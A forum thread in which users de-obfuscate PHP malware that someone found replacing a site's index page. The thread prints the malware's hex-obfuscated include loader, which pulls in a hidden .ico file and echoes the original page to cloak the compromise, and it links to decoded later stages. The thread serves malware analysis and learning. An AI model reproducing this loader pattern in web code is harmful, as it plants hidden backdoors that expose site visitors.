What kind of php malware is this?

So I found the below piece of code in my webhost account, it was smart enough to overwrite my default index.html and replaced it with index.php containing the below code which got executed each time someone hit the website without showing any signs of hacks to the end user.
Turns out my ftp username was compromised so thats how it found its way however I trying to decode and make sense of what exactly it does.

any takers ?

<?php

/*ade56*/

@include "\x2fhome\x2feddy\x77ebs/\x65ddyw\x65bs.c\x6fm/pa\x73swor\x64-gen\x65rato\x72/css\x2f.d40\x64f8b5\x2eico";

/*ade56*/


echo @file_get_contents('index.html.bak.bak');

Ooooh interesting. @ricksanchez check this out. Who wants some reverse engineering of real malware? @Cry0l1t3 @fraq @Evalion

If you remove all the '\x’s, you’ll notice that you get this:

home2feddy77ebs/65ddyw65bs.c6fm/pa73swor64-gen65rato72/css2f.d4064f8b52eico

Replacing all these ‘\xYY’ with their respective ASCII representantion yields:

@include "/home/eddywebs/eddywebs.com/password-generator/css/.d40df8b5.ico";

no idea what the ade56 is all about?
maybe it’s supposed to be a clever algo cloaking the actual #include…

wget eddywebs.com/password-generator/css/.d40df8b5.ico > sample
gives us a some weird ass php code. looks ‘encrypted’ with some number2character mapping…

@net_phile, can you see what is inside of that file?

If you navigate there, you find this…

https://bin.0x00sec.org/?43d378b1d2216006#lvlACzuo2Qm+PSmb+/rIxaqqdZDxG4r5UH5HnIRqBhI=

Reagrding the password generator:

http://www.eddywebs.com/ if that’s the URL it points to his github which has:

http://eddywebs.com/password-generator/css/.d40df8b5.ico

woops I missed that ‘/’ in that URL there. my bad

edit: but yeah that .ico file looks suspicious. especially the mapping from numbers to characters halfway in

Check the 0x00bin ^^, I copied and pasted it there.

I changed some of the variables to make things easier:

https://bin.0x00sec.org/?b700053e4e756c5a#G8AZeP1dHc8sQx855ork0kqeUIGIe8OTcTo871zP8Os=

So I’ve managed to get past the first level of obfuscation:

This is what it evals:

https://bin.0x00sec.org/?76470af471b05a47#rUUJouc5JzCU0HeRMzjbJVzXb+Y7RdsJ7Lk9HggR+BA=

changing the eval to an echo in the weird php code of the .ico and running it with php file reveals some new obfuscated php code.

I renamed the variables to my best knowledge:

https://bin.0x00sec.org/?636b78ef372b3298#0cYPTBYJlQnpcFVhdeaZxq7e692up51YBSTLxdhM7hc=

Hi there! Thanks for a fun challenge! I’m sharing here the clear-text code in its final stage

As a malware researcher, I encounter tons of examples as this. My main method is to clean the noise and let the malicious code to decrypt itself. If there’ll be a request I’ll write you a write-up of how I did it and why I did every step.

So what we have here?
Seems like an implementation of a TDS Client and an injection of a Javascript code to the browser. This is just an assumption from a quick read of the keywords.
I honestly didn’t read the code once I got to the final stage of a clear-text + commented code.
The next is for you as an exercise

You can try, for example, to decrypt the encoded config data.

Here’s the decrypted source – Enjoy!

https://bin.0x00sec.org/?245e01df980d279d#1nKpPUgNP9n26NFXybdiIrFK+STxF6xlx1Dw2eDOBck=

YES PLEASE! A websec noob like me could use such a thing.

Hi guys just got this @ricksanchez the file seems to be introduced on Aug 14 in webserver and is not in original src code.

Here was what I found in server using ls -la,

I will contact the sys admins to see find out any more info. About the actual contents of .ico file I guess smart folks here have already figured that out.

I like how the .dotfile name convention is used because if you use command ls it doesnt show.

anyways the dump for the ico is file is available here >> http://termbin.com/ern5

I 100% want to see a writeup for this. I got a little way through, but got stuck on the second level.

Real world malware is so useful to read about and learn from. If you did that, it would be awesome!

This topic was automatically closed 3 days after the last reply. New replies are no longer allowed.